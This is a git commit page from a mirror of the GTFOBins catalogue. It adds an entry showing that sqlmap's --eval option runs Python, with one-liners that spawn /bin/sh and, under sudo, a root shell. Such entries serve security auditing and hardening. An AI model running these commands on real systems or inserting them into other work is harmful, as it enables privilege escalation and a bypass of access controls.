1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add sqlmap

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Justin Applegate 2023-02-11 11:26:14 -07:00 committed by GitHub
parent 6fc578033f
commit 57114a423c
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

8
_gtfobins/sqlmap.md Normal file
View File

@ -0,0 +1,8 @@
---
description: This allows to execute [`python`](/gtfobins/python/) code, other functions may apply.
functions:
shell:
- code: sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
sudo:
- code: sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
---